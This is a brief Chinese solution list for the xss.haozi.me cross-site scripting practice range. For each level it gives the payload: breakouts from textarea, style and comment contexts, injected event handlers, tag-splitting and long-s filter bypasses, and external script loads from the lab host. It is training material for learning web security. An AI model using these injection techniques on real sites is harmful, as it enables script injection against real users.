靶场链接:https://xss.haozi.me/#/0x00
0x00
<script>alert(1);</script>
0x01
</textarea><script>alert(1);</script>
0x02
方法一 "></textarea><script>alert(1);</script>
方法二 " onclick="alert(1);
方法三 " onmouseover="alert(1);
0x03
<script>alert `1`;</script>
0x04
<input type="name" value="" onmouseover="alert(1)">
0x05
--!><script>alert(1);</script>
0x06
onmouseover
="alert(1);"
0x07
<body onload="alert(1);"
0x08
</style ><script>alert(1);</script>
0x09
https://www.segmentfault.com" onerror="alert(1);
0x0A
https://www.segmentfault.com@xss.haozi.me/j.js
0x0B
<script src="https://xss.haozi.me/j.js"></script>
0x0C
<scrscriptipt src="https://xss.haozi.me/j.js"></scrscriptipt>
0x0D
alert(1);
-->
0x0E
<ſcript src="https://xss.haozi.me/j.js"></script>
古英文ſ大写后为S
0x0F
'); alert('1
0x10
方法一 0;alert(1);
方法二 '';alert(1);
0x11
");alert("1
0x12
\");alert(1);//
1159

被折叠的 条评论
为什么被折叠?



